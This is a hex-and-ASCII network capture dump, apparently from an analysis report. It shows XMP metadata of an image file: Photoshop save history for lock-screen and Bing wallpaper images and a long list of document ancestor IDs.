                                                                                                                                                                                    2023-01-05 07:58:10 UTC2949INData Raw: 61 6e 64 73 63 61 70 65 30 30 31 46 34 37 39 32 30 44 35 46 34 31 44 38 35 43 33 30 44 45 36 34 33 44 46 35 42 35 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 34 2d 31 38 54 31 37 3a 31 30 3a 34 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 5c 42 69 6e 67 41 74 57 6f 72 6b 5c 43 48 4f 53 45 4e 5c 42 69 6e 67 41 74 57 6f 72 6b 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 37 33 38 30 39 39 35 30 5f 31 39 32 30 78 31 30 38 30 5f 77 74 72 6d 72 6b 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 34 2d 31 38 54 31 37 3a 31 31 3a 35 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c
                                                                                                                                                                                    Data Ascii: andscape001F47920D5F41D85C30DE643DF5B579.psb saved&#xA;2017-04-18T17:10:42-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Bing\BingAtWork\CHOSEN\BingAtWork_GettyImages-173809950_1920x1080_wtrmrk.jpg saved&#xA;2017-04-18T17:11:55-07:00&#x9;File C:\Users\v-l
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2965INData Raw: 6f 70 73 5c 4d 49 54 2d 4d 4c 42 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 36 36 30 34 34 34 37 32 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 31 31 54 31 36 3a 32 32 3a 35 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4d 49 54 2d 4d 4c 42 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 37 33 38 34 35 33 34 31 5f 31 39 32 30 78 31 30 38 30 32 41 36 45 34 45 38 42 43 33 35 30 32 39 46 43 46 30 45 36 32 34 36 35 32 33 42 30 32 39 33 38 2e 70 73 62 20 73 61 76 65 64 26 23 78 41
                                                                                                                                                                                    Data Ascii: ops\MIT-MLB_GettyImages-166044472_1920x1080.jpg saved&#xA;2017-05-11T16:22:55-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_MIT-MLB_GettyImages-173845341_1920x10802A6E4E8BC35029FCF0E6246523B02938.psb saved&#xA
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2973INData Raw: 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 53 75 6d 6d 65 72 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 4d 49 54 2d 53 75 6d 6d 65 72 4d 6f 76 69 65 54 56 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 32 38 35 35 32 36 36 35 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 31 38 54 31 30 3a 34 33 3a 31 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4d 49 54 2d 53 75 6d 6d 65 72 4d 6f 76 69 65 54 56 5f 47 65 74 74 79 49 6d 61
                                                                                                                                                                                    Data Ascii: ows10\MomentsInTime\SummerEntertainment\Chosen\Crops\MIT-SummerMovieTV_GettyImages-528552665_1920x1080.jpg saved&#xA;2017-05-18T10:43:12-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_MIT-SummerMovieTV_GettyIma
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2989INData Raw: 30 30 31 46 34 37 39 32 30 44 35 46 34 31 44 38 35 43 33 30 44 45 36 34 33 44 46 35 42 35 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 37 2d 31 33 54 31 34 3a 34 38 3a 34 33 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 37 2d 31 33 54 31 36 3a 34 31 3a 34 37 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 42 61 63 6b 54 6f 53 63 68 6f 6f 6c 5c 43 68 6f 73
                                                                                                                                                                                    Data Ascii: 001F47920D5F41D85C30DE643DF5B579.psb saved&#xA;2017-07-13T14:48:43-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1920x1080_Landscape.psd saved&#xA;2017-07-13T16:41:47-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\BackToSchool\Chos
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3021INData Raw: 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 30 30 31 46 34 37 39 32 30 44 35 46 34 31 44 38 35 43 33 30 44 45 36 34 33 44 46 35 42 35 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 30 32 54 31 36 3a 32 32 3a 34 39 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 45 64 67 65 47 72 6f 77 74 68 49 6d 61 67 65 73 5c 4c 6f 63 6b 32 30 31 37 5f 42 61 74 63 68 36 5c 5f 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4c 6f 63 6b 32 30 31 37 2d 42 36 5f 46 61 6c 6c 47 6c 65 6e 41 66 66 72 69 63 53 63 6f 74
                                                                                                                                                                                    Data Ascii: Photoshop CC 2017\AutoRecover\_Lockscreen_1920x1080_Landscape001F47920D5F41D85C30DE643DF5B579.psb saved&#xA;2017-08-02T16:22:49-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\BingEdgeGrowthImages\Lock2017_Batch6\_CHOSEN\Crops\Lock2017-B6_FallGlenAffricScot
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3140INData Raw: 35 43 33 30 44 45 36 34 33 44 46 35 42 35 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 32 38 54 31 36 3a 30 38 3a 30 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 45 64 67 65 47 72 6f 77 74 68 49 6d 61 67 65 73 5c 4c 6f 63 6b 32 30 31 37 5f 42 61 74 63 68 37 5c 43 72 6f 70 73 5c 4c 6f 63 6b 32 30 31 37 2d 42 37 5f 53 68 65 74 6c 61 6e 64 50 6f 6e 79 73 43 6f 72 6e 77 61 6c 6c 55 4b 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 38 34 39 32 36 31 31 38 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 32 38 54 31 36 3a 31 37 3a 31 37 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c
                                                                                                                                                                                    Data Ascii: 5C30DE643DF5B579.psb saved&#xA;2017-08-28T16:08:05-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\BingEdgeGrowthImages\Lock2017_Batch7\Crops\Lock2017-B7_ShetlandPonysCornwallUK_GettyImages-184926118_1920x1080.jpg saved&#xA;2017-08-28T16:17:17-07:00&#x9;Fil
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3333INData Raw: 34 42 38 45 31 45 41 32 31 37 30 41 39 39 31 45 41 31 31 43 41 42 41 43 45 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 30 2d 31 32 54 32 30 3a 32 31 3a 35 38 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2d 31 30 38 32 44 32 36 42 32 34 42 38 45 31 45 41 32 31 37 30 41 39 39 31 45 41 31 31 43 41 42 41 43 45 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 30 2d 31 32 54 32 30 3a 33 30 3a 32 38 2d 30 37 3a
                                                                                                                                                                                    Data Ascii: 4B8E1EA2170A991EA11CABACE.psb saved&#xA;2017-10-12T20:21:58-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_Lockscreen_1920x1080_Landscape-1082D26B24B8E1EA2170A991EA11CABACE.psb saved&#xA;2017-10-12T20:30:28-07:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3349INData Raw: 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 31 2d 31 36 54 31 32 3a 33 38 3a 33 30 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 31 31 2d 31 36 54 31 32 3a 34 32 3a 35 32 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 4a 68 61 72 6b 68 61 6e 64 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 45 64 67 65 2d 4a 68 61 72 6b 68 61 6e 64 5f 41 6c 61 6d 79 2d 44 58 44 30 46 47 5f 31 39 32 30 78 31 30 38 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 31 2d 31 36 54 31
                                                                                                                                                                                    Data Ascii: e.psd saved&#xA;2017-11-16T12:38:30-08:00&#x9;File Lockscreen_1920x1080_Landscape.psd opened&#xA;2017-11-16T12:42:52-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\Jharkhand\CHOSEN\Crops\Edge-Jharkhand_Alamy-DXD0FG_1920x1080.psd saved&#xA;2017-11-16T1
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3402INData Raw: 67 65 47 72 6f 77 74 68 49 6d 61 67 65 73 5c 4c 6f 63 6b 32 30 31 37 5f 42 61 74 63 68 39 5c 43 48 4f 53 45 4e 5c 52 65 70 6c 61 63 65 6d 65 6e 74 73 5c 4c 6f 63 6b 32 30 31 37 2d 42 39 5f 50 61 70 61 72 6f 61 4e 50 4e 65 77 5a 65 6c 61 6e 64 5f 35 30 30 70 78 2d 36 36 35 35 30 30 34 39 5f 31 39 32 30 78 31 30 38 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 32 2d 30 34 54 31 33 3a 30 37 3a 31 37 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 45 64 67 65 47 72 6f 77 74 68 49 6d 61 67 65 73 5c 4c 6f 63 6b 32 30 31 37 5f 42 61 74 63 68 39 5c 43 48 4f 53 45 4e 5c 52 65 70 6c 61 63 65 6d 65 6e 74 73 5c 4c 6f 63 6b 32 30 31 37 2d 42 39
                                                                                                                                                                                    Data Ascii: geGrowthImages\Lock2017_Batch9\CHOSEN\Replacements\Lock2017-B9_PaparoaNPNewZeland_500px-66550049_1920x1080.psd saved&#xA;2017-12-04T13:07:17-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\BingEdgeGrowthImages\Lock2017_Batch9\CHOSEN\Replacements\Lock2017-B9
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3466INData Raw: 73 5c 4d 4d 58 5c 52 4f 55 4e 44 32 5c 5f 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 57 69 6e 64 6f 77 73 4d 4d 58 2d 52 64 32 5f 35 30 30 70 78 2d 31 38 32 32 36 35 37 33 5f 31 39 32 30 78 31 30 38 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 31 2d 30 34 54 31 38 3a 35 38 3a 30 32 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 57 69 6e 64 6f 77 73 5c 4d 4d 58 5c 52 4f 55 4e 44 32 5c 5f 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 57 69 6e 64 6f 77 73 4d 4d 58 2d 52 64 32 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 36 33 36 34 32 33 36 37 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 31 2d 30 34 54 31 38 3a
                                                                                                                                                                                    Data Ascii: s\MMX\ROUND2\_CHOSEN\Crops\WindowsMMX-Rd2_500px-18226573_1920x1080.psd saved&#xA;2018-01-04T18:58:02-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Windows\MMX\ROUND2\_CHOSEN\Crops\WindowsMMX-Rd2_GettyImages-163642367_1920x1080.jpg saved&#xA;2018-01-04T18:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3498INData Raw: 6e 64 6f 77 73 31 30 5c 42 69 6e 67 45 64 67 65 47 72 6f 77 74 68 49 6d 61 67 65 73 5c 5f 4d 61 74 74 4f 6e 65 4f 66 66 73 5c 53 75 6e 72 69 73 65 54 61 72 74 75 6d 61 61 45 73 74 6f 6e 69 61 5f 4d 69 6e 64 65 6e 5f 37 30 30 32 36 30 36 36 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 32 2d 30 31 54 31 32 3a 33 34 3a 34 33 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 44 36 31 35 44 35 46 38
                                                                                                                                                                                    Data Ascii: ndows10\BingEdgeGrowthImages\_MattOneOffs\SunriseTartumaaEstonia_Minden_70026066_1920x1080.jpg saved&#xA;2018-02-01T12:34:43-08:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_Lockscreen_1920x1080_LandscapeD615D5F8
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3539INData Raw: 54 31 36 3a 30 39 3a 30 32 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 38 2d 30 32 2d 32 31 54 31 36 3a 31 31 3a 35 32 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 53 70 72 69 6e 67 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 4d 61 72 41 70 72 2d 42 65 6e 5c 43 72 6f 70 73 5c 4d 49 54 2d 4d 61 72 41 70 72 5f 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 39 34 30 34 34 32 35 31 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26
                                                                                                                                                                                    Data Ascii: T16:09:02-08:00&#x9;File Lockscreen_1920x1080_Landscape.psd opened&#xA;2018-02-21T16:11:52-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\SpringEntertainment\MarApr-Ben\Crops\MIT-MarApr_Entertainment_GettyImages-594044251_1920x1080.jpg saved&
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3649INData Raw: 42 46 31 42 32 46 36 35 39 33 35 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 33 2d 32 31 54 31 37 3a 30 37 3a 35 30 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 44 36 31 35 44 35 46 38 38 34 42 44 42 39 37 46 39 38 46 38 45 42 46 31 42 32 46 36 35 39 33 35 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 33 2d 32 31 54 31 37 3a 30 39 3a 30 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73
                                                                                                                                                                                    Data Ascii: BF1B2F65935.psb saved&#xA;2018-03-21T17:07:50-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_Lockscreen_1920x1080_LandscapeD615D5F884BDB97F98F8EBF1B2F65935.psb saved&#xA;2018-03-21T17:09:06-07:00&#x9;File C:\Us
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3705INData Raw: 31 39 37 32 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 39 45 36 39 34 33 35 44 32 36 33 30 34 32 34 45 35 33 42 39 34 44 44 39 31 45 42 44 37 43 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 41 30 30 41 41 31 34 39 46 41 33 39 37 37 34 44 30 36 37 46 38 36 45 33 45 31 43 41 32 44 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 41 30 46 38 46 31 34 30 45 41 42 43 42 41 45 34 43 46 42 39 32 44 34 33 37 37 35 35 41 45 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 41 30 46 42 43 32 41 35 39 35 39 37 37 30 31 37 38 45 30 41 34 38 44 30 36 43 38 32 37 31 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 41 31 36 37 37 34 38 38 46 36 30 38 35 32 39 43 37 34 43 33 45 39 44 33 42 45 32 32 36 32 30
                                                                                                                                                                                    Data Ascii: 1972C</rdf:li> <rdf:li>09E69435D2630424E53B94DD91EBD7C4</rdf:li> <rdf:li>0A00AA149FA39774D067F86E3E1CA2DE</rdf:li> <rdf:li>0A0F8F140EABCBAE4CFB92D437755AEB</rdf:li> <rdf:li>0A0FBC2A5959770178E0A48D06C8271D</rdf:li> <rdf:li>0A1677488F608529C74C3E9D3BE22620
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3769INData Raw: 32 30 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 46 41 44 32 45 39 42 32 32 44 30 39 30 46 43 44 31 42 31 30 31 37 30 31 36 39 36 36 44 33 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 46 42 31 31 46 32 39 32 35 38 33 35 38 34 32 31 33 45 41 44 37 34 41 46 36 43 31 35 34 30 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 46 42 32 33 34 46 32 37 32 45 38 41 30 33 38 37 33 33 36 43 37 35 31 38 37 39 36 45 34 41 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 46 43 32 43 32 32 45 45 32 30 46 37 32 41 39 30 45 45 45 34 39 38 46 46 30 34 42 42 42 39 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 46 43 33 32 32 45 31 43 32 42 35 36 36 45 37 43 37 44 44 36 42 44 38 32 41 31 38 34 38 33 32 3c 2f
                                                                                                                                                                                    Data Ascii: 20F</rdf:li> <rdf:li>0FAD2E9B22D090FCD1B1017016966D37</rdf:li> <rdf:li>0FB11F292583584213EAD74AF6C1540E</rdf:li> <rdf:li>0FB234F272E8A0387336C7518796E4AA</rdf:li> <rdf:li>0FC2C22EE20F72A90EEE498FF04BBB9B</rdf:li> <rdf:li>0FC322E1C2B566E7C7DD6BD82A184832</
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3832INData Raw: 32 37 41 31 43 31 32 39 37 34 44 37 35 35 46 34 43 36 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 41 45 38 39 43 37 30 33 39 36 35 41 41 43 45 42 45 38 36 32 35 43 41 35 35 42 42 38 43 30 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 41 45 39 33 42 32 33 44 35 45 35 38 45 37 38 31 44 42 45 37 36 38 42 39 35 33 46 42 45 31 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 41 46 38 31 38 31 42 43 31 34 33 31 30 37 46 37 39 38 32 41 39 41 42 35 31 46 42 39 45 35 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 42 30 32 45 39 34 31 35 36 42 35 35 32 45 30 43 30 31 39 33 34 46 30 32 33 41 33 44 33 30 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 42 30 41 42 32 35 38 34 36 35 41 42 35 35 46 32 32
                                                                                                                                                                                    Data Ascii: 27A1C12974D755F4C68</rdf:li> <rdf:li>1AE89C703965AACEBE8625CA55BB8C0D</rdf:li> <rdf:li>1AE93B23D5E58E781DBE768B953FBE1C</rdf:li> <rdf:li>1AF8181BC143107F7982A9AB51FB9E52</rdf:li> <rdf:li>1B02E94156B552E0C01934F023A3D30D</rdf:li> <rdf:li>1B0AB258465AB55F22
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3848INData Raw: 34 45 44 37 45 38 37 44 44 46 38 35 44 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 37 31 42 46 36 31 39 46 33 45 36 38 45 37 38 30 39 46 35 34 35 42 38 46 45 34 41 44 42 46 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 37 32 43 41 31 34 39 41 33 32 31 36 42 43 42 33 38 39 39 31 41 42 37 42 34 34 35 35 42 33 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 37 33 32 33 35 39 42 38 38 34 34 33 35 39 34 36 42 33 43 37 42 30 38 41 46 33 39 37 37 45 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 37 35 44 37 44 45 45 38 31 42 42 35 30 34 31 35 34 46 30 38 44 36 30 31 34 35 46 42 36 35 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 37 37 31 44 30 42 46 38 41 44 35 35 35 36 44 46 30 38 44 34 37 44
                                                                                                                                                                                    Data Ascii: 4ED7E87DDF85D0</rdf:li> <rdf:li>271BF619F3E68E7809F545B8FE4ADBFC</rdf:li> <rdf:li>272CA149A3216BCB38991AB7B4455B39</rdf:li> <rdf:li>2732359B884435946B3C7B08AF3977E3</rdf:li> <rdf:li>275D7DEE81BB504154F08D60145FB65C</rdf:li> <rdf:li>2771D0BF8AD5556DF08D47D
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3919INData Raw: 44 30 30 43 33 30 32 35 45 38 43 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 43 35 31 44 43 36 46 43 41 30 33 34 32 37 36 33 37 43 32 45 33 39 34 41 42 34 33 30 35 34 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 43 35 33 46 42 41 41 37 42 37 33 46 39 33 34 44 45 45 39 36 36 42 46 32 39 34 37 33 41 32 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 43 36 35 32 33 34 41 36 46 37 45 36 35 41 32 42 42 43 38 39 37 32 39 37 31 42 42 43 39 33 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 43 36 38 34 32 45 35 38 32 35 35 33 30 44 38 31 45 37 41 33 43 30 36 37 44 46 41 42 39 36 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 43 36 41 35 42 37 33 34 30 33 41 43 32 45 33 46 31 39 33 33 31 37 44 41
                                                                                                                                                                                    Data Ascii: D00C3025E8C4</rdf:li> <rdf:li>2C51DC6FCA03427637C2E394AB430544</rdf:li> <rdf:li>2C53FBAA7B73F934DEE966BF29473A21</rdf:li> <rdf:li>2C65234A6F7E65A2BBC8972971BBC93A</rdf:li> <rdf:li>2C6842E5825530D81E7A3C067DFAB965</rdf:li> <rdf:li>2C6A5B73403AC2E3F193317DA
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3951INData Raw: 37 37 34 39 37 33 37 39 41 44 34 44 42 44 44 43 36 41 38 36 32 36 44 30 35 41 36 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 38 33 31 39 41 36 42 37 39 44 31 36 35 36 42 33 30 32 46 45 33 39 36 36 33 34 30 38 32 41 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 38 34 33 44 41 32 37 33 46 43 42 42 36 43 30 44 42 34 44 36 41 37 39 32 46 30 46 44 34 41 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 38 35 30 39 37 43 35 30 45 37 35 45 43 43 31 30 33 43 45 31 32 38 33 34 34 37 38 41 34 37 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 38 35 42 30 32 38 44 41 33 45 42 38 37 36 38 33 42 38 32 33 39 32 46 32 31 34 33 33 33 36 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 38 36 33 31 32 45 33 32
